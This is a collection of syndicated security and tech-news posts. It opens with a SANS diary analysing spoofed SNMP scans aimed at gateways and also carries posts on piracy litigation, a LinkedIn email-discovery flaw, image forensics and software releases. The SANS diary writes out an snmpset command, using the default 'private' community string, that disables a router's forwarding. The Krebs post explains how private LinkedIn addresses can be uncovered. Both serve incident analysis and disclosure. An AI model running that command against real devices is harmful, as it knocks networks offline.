All the packet captures we received so far show the same behavior. The scans are sequential, so it is fair to assume that this is an internet wide scan. We have yet to find a vulnerable system, and I don’t think that vulnerable configurations are very common but please let me know if you know of widely used systems that allow for these SNMP commands. This could also just be a troll checking “what is happening if I send this”. 

1st Update

Thanks to James for sending us some packets. Unlike suggested earlier, this doesn’t look like a DoS against Google, but more like a DoS against vulnerable gateways. The SNMP command is actually a “set” command using the default read-write community string “private”. If successful, it should:

- set the default TTL to 1, which would make it impossible for the gateway to connect to other systems that are not on the same link-layer network.

- turn off IP forwarding.

Still playing with this, and so far, I haven’t managed to “turn off” any of my test systems. If you want to play, here are some of the details:

The SNMP payload of the packets reported by James:

Simple Network Management Protocol
    version: version-1 (0)
    community: private
    data: set-request (3)
        set-request
            request-id: 1821915375
            error-status: noError (0)
            error-index: 0
            variable-bindings: 2 items
                1.3.6.1.2.1.4.2.0:
                    Object Name: 1.3.6.1.2.1.4.2.0 (iso.3.6.1.2.1.4.2.0)
                    Value (Integer32): 1
                1.3.6.1.2.1.4.1.0:
                    Object Name: 1.3.6.1.2.1.4.1.0 (iso.3.6.1.2.1.4.1.0)
                    Value (Integer32): 2

 

The snmp set command I am using to re-create the traffic:

snmpset  -v 1 -c private [target ip] .1.3.6.1.2.1.4.2.0 int 1 .1.3.6.1.2.1.4.1.0 int 2

any insight is welcome. Still working on this and there may be more to it then I see now (or less…)

 

— end of update —

We are receiving some reports about SNMP scans that claim to originate from 8.8.8.8 (Google’s public recursive DNS server). This is likely part of an attempt to launch a DDoS against Google by using SNMP as an amplifier/reflector.

Please let us know if you see any of the packet. The source IP should be 8.8.8.8 and the target port should be 161 UDP. For example in tcpdump:

tcpdump -s0 -w /tmp/googlensmp dst port 161 and src host 8.8.8.8

Thanks to James for sending us a snort alert triggered by this:

Sep 15 11:07:07 node snort[25421]: [1:2018568:1] ET CURRENT_EVENTS Possible Inbound SNMP Router DoS (TTL 1) [Classification: Attempted Denial of Service] [Priority: 2] {UDP} 8.8.8.8:47074 -> x.x.251.62:161

So far, it does not look like service to Google’s DNS server is degraded.


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: ISP Wants Court to Sanction Piracy Monitoring Firm

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

rightscorp-realFor several months Rightscorp has been sending DMCA subpoenas to smaller local ISPs in the United States.

Unlike regular subpoenas, these are not reviewed by a judge and only require a signature from the Court clerk. This practice raised questions because DMCA subpoenas are not applicable to file-sharing cases, which is something courts determined more than a decade ago.

Perhaps unaware of the legal precedent, most ISPs have complied with the requests. Until last week, when small Texas provider Grande Communications stood up in court after it was asked to reveal the account details connected to 30,000 IP-addresses/timestamp combinations.

Soon after Grande filed its objections Rightscorp decided to drop the request entirely. While ISP is pleased that its customers no longer have to be exposed, the company is not letting Rightscorp off the hook.

In an advisory to the court (pdf) the ISP notes that Rightscorp’s actions suggest that it’s merely trying to avoid having a judge look at their dubious efforts.

“The abrupt withdrawal of the Subpoena is consistent with the apparent desire of Rightscorp and its counsel to avoid judicial review of their serial misuse of the subpoena power of the federal courts,” Grande’s attorneys write.

The ISP still wants Rightscorp to pay for the costs run up thus far. In addition, Grande also believes that sanctions for misusing the federal court’s subpoena powers may be in order.

“The U.S. District Court for the Central District of California may consider ordering Rightscorp and its counsel to show cause why they should not be sanctioned for misusing the federal court’s subpoena powers,” the advisory reads.

The ISP points out that if it hadn’t challenged the subpoena, the personal details of hundreds or thousands of subscribers would have been shared based on a faulty procedure. Since similar requests are being sent to other ISPs, the matter warrants further investigation.

“It appears clear that Rightscorp and its counsel are playing a game without regard for the rules, and they are playing that game in a manner calculated to avoid judicial review. Hopefully, they will not be permitted to continue much longer,” Grande’s attorneys conclude.

Rightscorp’s withdrawal of the subpoena also contradicts earlier comments the company’s CEO Christopher Sabec made to TorrentFreak.

Sabec told us that the company believes that earlier decisions on the legitimacy of DMCA subpoenas in file-sharing cases were wrong, and will be overturned should the issue reach the Supreme Court.

Apparently, this was a veiled threat, perhaps to discourage Internet providers from starting a battle that could get very expensive. Instead, with possible sanctions pending, things may now get expensive for Rightscorp.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: LinkedIn Feature Exposes Email Addresses

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing.

leakedinlogoLinkedIn has built much of its considerable worth on the age-old maxim that “it’s all about who you know”: As a LinkedIn user, you can directly connect with those you attest to knowing professionally or personally, but also you can ask to be introduced to someone you’d like to meet by sending a request through someone who bridges your separate social networks. Celebrities, executives or any other LinkedIn users who wish to avoid unsolicited contact requests may do so by selecting an option that forces the requesting party to supply the personal email address of the intended recipient.

LinkedIn’s entire social fabric begins to unravel if any user can directly connect to any other user, regardless of whether or how their social or professional circles overlap. Unfortunately for LinkedIn (and its users who wish to have their email addresses kept private), this is the exact risk introduced by the company’s built-in efforts to expand the social network’s user base.

According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users.

LinkedIn assumes that if an email address is in your contacts list, that you must already know this person. But what if your entire reason for signing up with LinkedIn is to discover the private email addresses of famous people? All you’d need to do is populate your email account’s contacts list with hundreds of permutations of famous peoples’ names — including combinations of last names, first names and initials — in front of @gmail.com, @yahoo.com, @hotmail.com, etc. With any luck and some imagination, you may well be on your way to an A-list LinkedIn friends list (or a fantastic set of addresses for spear-phishing, stalking, etc.).

LinkedIn lets you know which of your contacts aren't members.

LinkedIn lets you know which of your contacts aren’t members.

When you import your list of contacts from a third-party service or from a stand-alone file, LinkedIn will show you any profiles that match addresses in your contacts list. More significantly, LinkedIn helpfully tells you which email addresses in your contacts lists are not LinkedIn users.

It’s that last step that’s key to finding the email address of the targeted user to whom LinkedIn has just sent a connection request on your behalf. The service doesn’t explicitly tell you that person’s email address, but by comparing your email account’s contact list to the list of addresses that LinkedIn says don’t belong to any users, you can quickly figure out which address(es) on the contacts list correspond to the user(s) you’re trying to find.

Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information. Last month, the two researchers detailed how they were able to de-anonymize posts to Secret, an app-driven online service that allows people to share messages anonymously within their circle of friends, friends of friends, and publicly. In February, Seely more famously demonstrated how to use Google Maps to intercept FBI and Secret Service phone calls.

This time around, the researchers picked on Dallas Mavericks owner Mark Cuban to prove their point with LinkedIn. Using their low-tech hack, the duo was able to locate the Webmail address Cuban had used to sign up for LinkedIn. Seely said they found success in locating the email addresses of other celebrities using the same method about nine times out ten.

“We created several hundred possible addresses for Cuban in a few seconds, using a Microsoft Excel macro,” Seely said. “It’s just a brute-force guessing game, but 90 percent of people are going to use an email address that includes components of their real name.”

The Rhino guys really wanted Cuban’s help in spreading the word about what they’d found, but instead of messaging Cuban directly, Seely pursued a more subtle approach: He knew Cuban’s latest start-up was Cyber Dust, a chat messenger app designed to keep your messages private. So, Seely fired off a tweet complaining that “Facebook Messenger crosses all privacy lines,” and that as  result he was switching to Cyber Dust.

When Mark Cuban retweeted Seely’s endorsement of Cyber Dust, Seely reached out to Cyberdust CEO Ryan Ozonian, letting him known that he’d discovered Cuban’s email address on LinkedIn. In short order, Cuban was asking Rhino to test the security of Cyber Dust.

“Fortunately no major faults were found and those he found are already fixed in the coming update,” Cuban said in an email exchange with KrebsOnSecurity. “I like working with them. They look to help rather than exploit.. We have learned from them and I think their experience will be valuable to other app publishers and networks as well.”

Whether LinkedIn will address the issues highlighted by Rhino Security remains to be seen. In an initial interview earlier this month, the social networking giant sounded unlikely to change anything in response.

Corey Scott, director of information security at LinkedIn, said very few of the company’s members opt-in to the requirement that all new potential contacts supply the invitee’s email address before sending an invitation to connect. He added that email address-to-user mapping is a fairly common design pattern, and that is is not particularly unique to LinkedIn, and that nothing the company does will prevent people from blasting emails to lists of addresses that might belong to a targeted user, hoping that one of them will hit home.

“Email address permutators, of which there are many of them on the ‘Net, have existed much longer than LinkedIn, and you can blast an email to all of them, knowing that most likely one of those will hit your target,” Scott said. “This is kind of one of those challenges that all social media companies face in trying to prevent the abuse of [site] functionality. We have rate limiting, scoring and abuse detection mechanisms to prevent frequent abusers of this service, and to make sure that people can’t validate spam lists.”

In an email sent to this report last week, however, LinkedIn said it was planning at least two changes to the way its service handles user email addresses.

“We are in the process of implementing two short-term changes and one longer term change to give our members more control over this feature,” Linkedin spokeswoman Nicole Leverich wrote in an emailed statement. “In the next few weeks, we are introducing new logic models designed to prevent hackers from abusing this feature. In addition, we are making it possible for members to ask us to opt out of being discoverable through this feature. In the longer term, we are looking into creating an opt-out box that members can choose to select to not be discoverable using this feature.”

LWN.net: LedgerSMB 1.4.0 released

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Version 1.4.0 of the LedgerSMB accounting system is out. It features a new
contact management subsystem, a reworked report generation subsystem,
better integration with other business applications, and more. The
announcement left out download information; those who are interested can
find the software at ledgersmb.org.

TorrentFreak: Email: Warner Bros Conspired with New Zealand Over Kim Dotcom Extradition

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Ever since the raids of 2012, Kim Dotcom has pointed to what he sees as a contract shutdown of Megaupload. Designed by Hollywood and carried out by their partners in the Obama administration and the New Zealand Government, Dotcom claims that his fate was pre-determined and a result of corruption.

One of his claims is that despite the reservations of those in New Zealand’s intelligence departments, Dotcom was allowed to become a resident of the country. This, the entrepreneur says, was carried out to pin him down in a friendly location so that he could be dealt with by the United States.

This morning, at his Moment of Truth event, Dotcom rolled out big guns including journalist Glenn Greenwald, Wikileaks’ Julian Assange and even Edward Snowden himself to deliver his “bombshell”. The latter appeared via video links, connections which Dotcom said we’re being run through a new encrypted browser-based platform under development at Mega.

Moment

Much of the discussion centered around the alleged unlawful domestic surveillance of New Zealand citizens by their own Government, but the panel frequently weaved in elements of Dotcom’s own unique situation.

“We share the same prosecutor, so I understand what is going on there, on a very personal level,” Julian Assange said of Dotcom.

“[The United States Government] is trying to apply US law in as many countries as possible, applying their law in New Zealand to coerce and pluck out people to other states,” Assange said.

“When you are able to control their police forces you have succeeded in annexing that country. It’s a problem for me personally and it’s a problem for Kim Dotcom.”

Dotcom’s human rights lawyer Robert Amsterdam spoke at length on the perils of the Trans Pacific Partnership and criticized the New Zealand Government for its treatment of Dotcom.

“What they did [to Kim Dotcom during the 2012 raid] is so beyond the pale that the leader of that democratic government should have resigned on the spot that day,” Amsterdam said.

The event was highly polished and was well received by those in attendance, but failed to deliver on one key front. Dotcom previously said that he would present “absolutely concrete” evidence that Prime Minister John Key knew about him earlier than he had claimed. In the event, nothing remotely of that nature was presented.

However, several hours before the Moment of Truth got off the ground, New Zealand media began reporting that Dotcom would reveal an email at the event, one that would prove that Hollywood had an arrangement with Key to allow Dotcom into the country in order to extradite him to the United States.

The email in question, dated October 27, 2010, was allegedly sent by current Warner Bros CEO Kevin Tsujihara to Michael Ellis of the MPA/MPAA.

Tsujihara is one of the Warner executives the company sent to New Zealand in 2010 to deal with a dispute that was putting at risk the filming of the Hobbit movies in the country. During his visit Tsujihara met John Key and the email purports to report on one of those meetings.

“Hi Mike. We had a really good meeting with the Prime Minister. He’s a fan and we’re getting what we came for,” the leaked copy of the email reads.

“Your groundwork in New Zealand is paying off. I see strong support for our anti-piracy effort. John Key told me in private that they are granting Dotcom residency despite pushback from officials about his criminal past. His AG will do everything in his power to assist us with our case. VIP treatment and then a one-way ticket to Virginia.

“This is a game changer. The DOJ is against the Hong Kong option. No confidence in the Chinese. Great job,” the email concludes.

keymail

But while an email of this nature would have indeed warranted a “bombshell” billing, the Moment of Truth concluded without it or any other similar evidence being presented. Even before the event began, Warner Bros were on record describing the email as a fake.

“Kevin Tsujihara did not write or send the alleged email, and he never had any such conversation with Prime Minister Key,” said Paul McGuire, Warner Bros.’ senior vice president for worldwide communications.

“The alleged email is a fabrication,” he added.

The lack of the promised big reveal is fairly dramatic in itself. It’s certainly possible that Dotcom’s team lost confidence and pulled the reveal at the last minute, which would be a wise move if its authenticity was in doubt.

If the email is indeed proven to be a fake, big questions will need to be answered by the person who provided it because up until very recently Dotcom was staking his shirt on it. If it’s genuine, and proving that will be easier said than done now, we’ll definitely hear more as the weeks unfold.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: A Novel Approach

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’ve previous written about why I dislike the academic publication process. In particular, the publication process is not fast; papers can take years to become published. Peer review means almost nothing with regards to completeness, accuracy, or applicability. Most papers are far too complicated for anyone but the author to understand. References are usually incomplete and heavily biased toward tight circles of friends. When papers are published, the costs to read the paper is prohibitively expensive; only the wealthy can access these papers (and given the errors and oversights, most papers are not worth the cost). And finally, there’s the entire oneupmanship issue, where one minor change is deemed worthy of a full paper and not just a footnote.

Along these same lines, I think the term “novel” is overused in academic papers. According to Webster’s dictionary, novel refers to something “new and not resembling something formerly known or used”, or something that is “original or striking especially in conception or style”. However, academic articles typically use “novel” to mean “I couldn’t find someone else who found this same minor result.” When I see ‘novel’ in a paper’s title, I associate it with a three year old yelling “Mom! Mom! Mom! Look! Look! Look at what I can do!”

I searched Google Scholar for academic articles that used the word “novel” in their title. There were about 737,000 results. Then I began to read some of the PDF documents. A few did appear to be novel, but the vast majority were minor changes to existing approaches that had minimal differences in the results and were applicable to specific corner-case situations. I would hardly call them “novel”.

It’s Novel!

One of my loyal blog readers pointed me to an article in the Journal of Forensic Sciences: “A Novel Forged Image Detection Method Using the Characteristics of Interpolation” (Hwang and Har in J Forensic Sci, January 2013, Vol. 58, No. 1). He noted that the results look similar to Error Level Analysis and wanted my thoughts on the algorithm.

The paper’s basic approach: rather than using a JPEG resave to reduce noise in the picture, this approach uses a scaling algorithm. For example, you take your 4000×3000 picture and scale it to 72% of the original size (to 2880×2160). Then you scale it back up to 4000×3000 and compare the difference with the original picture. Digital alterations should appear as an altered area in the picture.

In the paper, they even discuss using different scaling algorithms: nearest neighbor, bilinear, and bicubic. (However, their paper makes it sound like these are the only scaling algorithms.)

My criticisms with this paper are not related to their approach. Rather, I’m more concerned with the lack of limitations, no details on how they determined parameters, failure to mention applicability, and whether this is really “novel”.

But before discussing the limitations, let’s focus on the good parts. First off, the paper is relatively well written and easy to understand. The algorithm is a logical extension to existing knowledge.

How it works

Digital pictures contain high frequency and low frequency components. The low frequencies define the overall structure of the image. The high frequencies fill in details. And camera sensors introduce extremely high frequencies that we may not visually notice.

There are lots of different algorithms that measure signal noise. Error Level Analysis (ELA) is one such example. It measures the lossiness from repeated JPEG compressions. A picture with more high frequency noise will change more during a JPEG save than a lower quality picture. And when a picture is first altered, the modified areas will usually have a significantly different error level potential.

There are two JPEG properties that permit ELA to work. The first is JPEG’s use of integer values. Each JPEG save converts the picture to frequencies using floating-point values. But then the values are stored as integers, resulting in fractional truncations. These lost fractions cause JPEG to be a lossy format since some information is removed each time the picture is saved.

The second JPEG property is the use of discrete cosine transforms (DCTs) with weighted quantization matrices (Q tables). The Q tables identify how large the truncated fractions can be. In general, high frequencies are cut off more than low frequencies — this is because low frequencies define the picture’s shape. If a little of the fine detail is removed, most people won’t notice the impact to the picture. (For more details on how JPEG compression works, see “How I Met Your Mother Through Photoshop“.)

Any algorithm that reduces high frequencies and uses integer truncation should be able to identify similar high-frequency edits.

JPEG compression is not the only way to remove high frequencies from a picture. As I mentioned in “Quality is Job One“, simply scaling the picture smaller will remove high frequencies. If you scale a picture smaller and then scale it back up, it will look blurrier than the original picture because the high-frequency fine details are removed. Specifically, the scaling removes values (lossy transaction) and the integer truncations makes the loss permanent.

In this example, I scaled the picture to 25% of the full size, then scaled it back up. You can see how the scaled larger picture lost high frequencies and looks blurrier compared to the source picture.

The main difference between the JPEG resave and image scaling approaches concerns where the cutoffs occur. With JPEG, each DCT value represents a frequency band. Every frequency band looses a little, but the higher frequencies loose more than the low frequencies. With scaling, you only lose the high frequencies and not a little from every frequency band.

Enough theory! Show me pictures!

So here’s an example from a picture uploaded to FotoForensics. The source picture was scaled smaller, to 80% of the original size using a bicubic algorithm. When it was scaled larger, high frequency details were lost. Then I compared the difference between the rescaled picture and the source:

In this example, you can see how the algorithm highlights the areas that were modified in the source picture. This happens because the unmodified areas lost high frequencies at a different rate compared to the modified areas.

And the bad news?

The first thing to notice is that every sample picture in their paper shows that their algorithm works. But every one of those samples was created by the authors of the paper. In effect, they selectively chose/manufactured pictures that would give the appearance of a high-performance algorithm.

I ran the algorithm past 100 picture from FotoForensics. I used both bilinear and bicubic scaling, and scale values between 50% and 100%. The scale-compare algorithm was able to highlight modifications in ten pictures. It missed all of the others — 90% failure rate. Moreover, the cases where it worked are all extreme pictures — large images where the modifications are so obvious that they were caught by every frequency analysis algorithm I have.

Here is the same example of a modified image (left), along with the ELA (middle) and their scaling comparison (using 80% reduction with bicubic scaling) on the right.

And here’s a typical case where scale-compare missed it. Again, ELA is the 2nd image and scale-compare is on the right:

And here’s another example from Reddit’s Photoshopbattles: “Guy riding a dinosaur“. Yes, they removed two people riding a dinosaur… ELA shows the modified areas, but scale-compare failed to highlight anything.

ELA certainly isn’t perfect. If a picture undergoes multiple resaves, scaling, or significant recoloring, then the noise patterns are all normalized and ELA will not highlight anything abnormal. In every instance where ELA was unable to highlight modifications, scale-compare also failed.

There are other limitations with this research. For example:

  • They suggest using bilinear, bicubic, and nearest neighbor for scaling. However, they don’t discuss the circumstances when one will work and another will fail.

  • The paper says to use “1/N” and “N” as the reduction and enlargement scaling factors. However, they never explain how to find a good “N” value. Their samples use values such as 86%, 74%, and 53%, but with no explanation on how they came up with those values. (I’m suspecting brute-force trial and error until they found one that looked good for their paper.)
  • This scale-compare algorithm can highlight significant differences in noise quality. However, it is mostly limited to detecting smudge and blurs. It typically misses splices.
  • The last paragraph in the paper does mention one limitation. It says that scale-compare does not work well for pictures saved using “compression quality <6 in Photoshop”. However, it also does not work with higher compression levels, pictures that have been repeatedly resaved, most web-size pictures (those less than 800×800), and anything from Facebook, Instagram, Twitter, and most online dating sites. Scaling a picture smaller will lessen the ability to highlight modifications, and significant scaling will completely remove this algorithm’s ability to detect alterations. (I’m ignoring the issue about the values from Photoshop Quality 6 changing based on the version of Photoshop.)
  • There’s also a lack of information about performance. No metrics about the ability to highlight modifications from an random selection of images, and nothing about speed. Scaling a large picture twice can be significantly slower than saving and loading the image.

Finally, they did not mention any other variations to this approach. For example, you can apply a Gaussian blur, box filter blur, or FFT low-pass filter to the picture in order to remove high frequencies. Each of these will work just as well as their scale-compare algorithm.

Here’s that same sample picture, compared against a box-filter blur of itself. The results are almost the same as the scale-compare algorithm, but took a fraction of the time to compute:

Mom! Mom! Mom! Look! Look! Look at what I can do!

This scale-and-compare method described by Hwang and Har is yet-another approach to detecting changes in high-frequency noise. However, there are no situations where this approach will detect something that other, faster algorithms would miss. Moreover, Hwang and Har left out a significant amount of information, such as how to tune parameters. Finally, their approach used well-known artifacts from scaling and blurring, and the common method of comparing against the original size — none of this is new or “novel”.

Back in 2005, Hsiao and Pei wrote “Detecting digital tampering by blur estimation“. This paper uses a variation of the Gaussian blur and box filter blur comparison that I described. And in 2008, Mahdian and Saic wrote “Blind Authentication Using Periodic Properties of Interpolation“, where they actually used bilinear and bicubic scaling to identify alterations (see the Mahdian/Saic PDF pages 6-7) and extended it to handle rotations and skewing. (And Hwang/Har knew about Mahdian/Saic, since they listed that paper as citation #18.) To put it bluntly, the work by Hwang and Har is an interesting rewrite of existing technologies, but it is incomplete, heavily biased, and certainly not “novel”.

Errata Security: Hacker "weev" has left the United States

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Hacker Andrew “weev” Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country:

I wonder what that means. On one hand, he could go full black-hat and go on a hacking spree. Hacking doesn’t require anything more than a cheap laptop and a dial-up/satellite connection, so it can be done from anywhere in the world.

On the other hand, he could also go full white-hat. There is lots of useful white-hat research that we don’t do because of the chilling effect of government. For example, in our VNC research, we don’t test default password logins for some equipment, because this can be interpreted as violating the CFAA. However, if ‘weev’ never intends on traveling to an extradition country, it’s something he can do, and report the results to help us secure systems.

Thirdly, he can now freely speak out against the United States. Again, while we theoretically have the right to “free speech”, we see how those like Barret Brown are in jail purely because they spoke out against the police-state.

TorrentFreak: Censorship Is Not The Answer to Online Piracy

This post was syndicated from: TorrentFreak and was written by: Simon Frew. Original post: at TorrentFreak

This is a guest post written by Simon Frew, Deputy President of Pirate Party Australia.

The Australian Government recently called for submissions into its plans to introduce a range of measures that are the long-standing dreams of the copyright lobby: ISP liability, website blocking for alleged pirate sites and graduated response.

The Government’s discussion paper specifically asked respondents to ignore other Government inquiries into copyright. This meant ignoring an inquiry by the Australian Law Reform Commission (ALRC) into copyright in the digital economy and an IT pricing inquiry. These reviews both covered important aspects of sharing culture in the 21st century, yet they were completely ignored by the Government’s paper and respondents were instructed to ignore issues covered in them.

The ALRC review examined issues around the emerging remix culture, the ways the Australian copyright regime limits options for companies to take advantage of the digital environment and issues around fair dealing and fair use. It recommended a raft of changes to update Australian copyright law to modernize it for the digital age. Whilst the recommendations were modest, they were a step in the right direction, but this step has been ignored by the Australian Parliament.

The IT pricing inquiry held last year, looked into why Australians pay exorbitant prices for digital content, a practice that has been dubbed the Australia Tax. Entertainment and Tech companies were dragged in front of the inquiry to explain why Australians pay much more for products than residents of other countries. The review found that, compared to other countries, Australians pay up to 84% more for games, 52% more for music and 50% more for professional software than comparable countries. The result of this review was to look at ways to end geographic segmentation and to continue to turn a blind eye to people using Virtual Private Networks (VPNs) to circumvent the higher prices in Australia.

Between the Australia Tax and the substantially delayed release dates for TV shows and movies, Australians don’t feel too bad about accessing content by other means. According to some estimates, over 200,000 people have Netflix accounts by accessing the service through VPNs.

Pirate Party Australia (PPAU) responded to the latest review with a comprehensive paper, outlining the need to consider all of the evidence and what that evidence says about file-sharing.

To say the Government’s discussion paper was biased understates the single-mindedness of the approach being taken by the Government. A co-author of the Pirate Party submission, Mozart Olbrycht-Palmer summed it up:

The discussion paper stands out as the worst I have ever read. The Government has proposed both a graduated response scheme and website blockades without offering any evidence that either of these work. Unsurprisingly the only study the discussion paper references was commissioned by the copyright lobby and claims Australia has a high level of online copyright infringement. This calls into question the validity of the consultation process. The Government could not have arrived at these proposals if independent studies and reports had been consulted.

The entire review was aimed at protecting old media empires from the Internet. This is due in part, to the massive support given to the Liberal (Conservatives) and National Party coalition in the lead-up to the 2013 federal election which saw Murdoch owned News Ltd media, comprising most major print-news outlets in Australia, actively campaign for the in-coming Government. There is also a long history of media companies donating heavily to buy influence. Village Roadshow, one of Australia’s largest media conglomerates, has donated close to four million dollars to both major parties since 1998: in the lead up to the 2013 election alone, they donated over $300,000 to the LNP.

The sort of influence being wielded by the old media is a big part of what Pirate parties worldwide were formed to counter. The Internet gives everyone a platform that can reach millions, if the content is good enough. The money required to distribute culture is rapidly approaching zero and those who built media empires on mechanical distribution models (you know, physical copies of media, DVDs, cassettes etc) want to turn the clock back, because they are losing their power to influence society.

Much of the Pirate Party response centred on the need to allow non-commercial file-sharing and dealing with the wrong, bordering on fraudulent assumptions, the paper was based on. From the paper:

Digital communications provide challenges and opportunities. Normal interactions, such as sharing culture via the Internet, should not be threatened. Creators should seize the new opportunities provided and embrace new forms of exposure and distribution. The Pirate Party believes the law should account for the realities of this continually emerging paradigm by reducing copyright duration, promoting the remixing and reuse of existing content, and legalising all forms of non-commercial use and distribution of copyrighted materials.

The discussion paper asked, ‘What could constitute ‘reasonable steps’ for ISPs to prevent or avoid copyright infringement?’ This was of particular concern because it is aimed at legally overturning the iiNet case, which set a legal precedent that ISPs couldn’t be sued for the behavior of their users. This section was a not-so-subtle attempt to push for a graduated response (‘three strikes’) system which has been heavily criticized in a number of countries.

The agenda laid out in this discussion paper was very clear, as demonstrated by Question 6: “What matters should the Court consider when determining whether to grant an injunction to block access to a particular website?”

The Pirate Party obviously disagrees with the implication that website blocking was a foregone conclusion. Censorship is not the answer to file-sharing or any other perceived problem on the Internet. Government control of the flow of information is not consistent with an open democracy. The Pirate Party submission attacked website blocking on free speech grounds and explained how measures to block websites or implement a graduated response regime would be trivial to avoid through the use of VPNs.

On Tuesday September 9, a public forum was held into the proposed changes. The panel was stacked with industry lobbyists, no evidence was presented while the same tired arguments were trotted out to try to convince attendees that there was need to crack down on file-sharing. It wasn’t all bad though, with the host of the meeting, Communications Minister Malcolm Turnbull, flagging a Government re-think on how to tackle piracy after the scathing responses to the review from the public.

Despite signalling a re-think, the Australian Government is still intent on implementing draconian copyright laws. Consumers may have won this round, but the fight will continue.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The diaspora* blog: diaspora* version 0.4.1.0 released!

This post was syndicated from: The diaspora* blog and was written by: Diaspora* Foundation. Original post: at The diaspora* blog

diaspora-logo

We're pleased to announce the release of diaspora* v0.4.1.0, which includes lots of bug fixes, changes and also new features. This release has already been tested as a release candidate by some community pods, so we don't expect too much difficulty for podmins when upgrading.

Here are the changes within this release:

  • The admin user search has been improved and admins can also close accounts directly from the admin panel. Project founder Maxwell Salzberg helped to add the account close feature, while Florian Staudacher did the admin UI tweaks.
  • Mikael Nordfeldth improved the federation layer by referencing the Salmon endpoint in Webfinger XRD. This change was made to allow GNU Social and other decentralized networks to integrate with diaspora* more easily than before.
  • Brandon made it possible to enter birth years from 1910 onwards on signup. Our more elderly users shouldn't have to lie about their birth year!
  • The 'lightbox' image viewer has been fixed by Faldrian. Now you can view a large number of photos without having the thumbnails block the actual photo.
  • Also from Faldrian, the in-app Help feature now has a section about keyboard shortcuts. Check them out from your user settings menu.
  • Poll creation was made easier by Damz and lianne from WeGotCoders by automatically adding a new poll answer field without requiring an additional mouse click.
  • A new Terms of Service/Privacy Policy feature is available thanks to Jason Robinson. Podmins can now enable either a template ToS (provided in the code) or write their own. Users will be asked to agree to the ToS on signup.
  • Jason also provided a Rake task to enable podmins to send an email to all or a specific group of users.
  • Damz from WeGotCoders added external crosspost services to the statistics.json output of pods. This allows pod lists to show which services are enabled for which pods, allowing new users to better choose a pod that matches the features they need.
  • Jaiden Gerig tweaked the notifications page 'Mark All Read' button to not mark all notifications as read, but mark those notifications as read that are visible in the current filter.
  • Petru Hincu and Florian Staudacher improved the way ignoring a user from the stream works. Now all visible posts from that user are hidden from the stream immediately.
  • It is now possible to delete previously uploaded photos from the photos stream. Thanks Lianne and Daniel Sun from WeGotCoders for this much-requested addition.
  • Most of the remaining Blueprint CSS framework pages have now been ported to Bootstrap. This includes the admin, help, getting started, people search, settings and contacts done during this release. For this important work we thank Florian Staudacher, Pablo Cúbico and Błażej Pankowiak.
  • The login page has been completely redesigned by Steffen van Bergerem to fit the rest of the UI.

Bug fixes to old functionality;

  • Petru Hincu fixed a problem with the poll creation elements not being hidden after submission of the post.
  • kpcyrd helped patch a self-XSS in the aspect rename functionality.
  • Jonne Haß fixed Catalan JavaScript translations, which were breaking the new conversation contact search.
  • Dennis Schubert fixed mobile signups, which had been broken by a regression in 0.4.0.0.
  • Erwan Guyader fixed two bugs with notifications. Now "mentioned" and "started sharing" notifications are correctly marked as read on clicking the notification.
  • Utah K Newman and Lyz Ellis fixed UI issues with input element borders.
  • Florian Staudacher fixed a particularly annoying bug where the hovercards got hidden in some situations under other UI elements.

Under the hood, there have been some non-visible changes, including;

  • Petru Hincu refactored some of the notifications code.
  • Goob helped to clarify the configuration defaults and explanations in the application configuration files.

As always, Jonne Haß has done a huge amount of work in maintaining the code base, making sure dependencies are up to date and helping our contributors improve their code. A big thanks also to Steffen von Bergerem and Florian Staudacher in helping land the UI changes.

Several new contributors pushed code this release, including Mikael Nordfeldth, Damz, Daniel Sun, Jaiden Gerig, Lianne, kpcyrd, Utah K Newman and Lyz Ellis. Big thanks to all of them for joining our effort, and a special mention to WeGotCoders, who have chosen diaspora* as a project to help their students learn Ruby on Rails.

A huge thank you to all the contributors from the whole community! If you want to help make diaspora* even better, please check out our getting started guide.

Podmins, please read the changelog for information about the manual steps necessary to upgrade to this release. For those of you who have been testing the release candidate, to get back to the stable release branch, run git checkout master before the update.

TorrentFreak: Jacob Appelbaum Gives Testimony in Gottfrid Svartholm Trial

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Warg and his alleged 21-year-old Danish accomplice continued this week in Copenhagen, Denmark. While the Pirate Bay founder answered questions during week one, this Wednesday marked the first day the 21-year-old answered questions.

The man, whose identity is being protected, told the Court that while he’s had no formal IT training, he is indeed a computer security expert who had been involved in testing computer systems to see how they hold up to external threats. He admitted working for American, Australian and Danish companies.

The 21-year-old Dane refused to say whether he knows Gottfrid on the grounds that he could be attacked in prison. He did admit to having previously heard about Gottfrid, however.

“Most people in the IT sector have heard of him,” he said.

The Dane also admitted to traveling to Cambodia to visit friends and smoke cannabis, but denied that he went there to meet Gottfrid at his apartment.

The prosecution also presented some emails in which the man said that CSC, the IT company involved in the hack, was owned by the CIA, but he dismissed that comment as a joke.

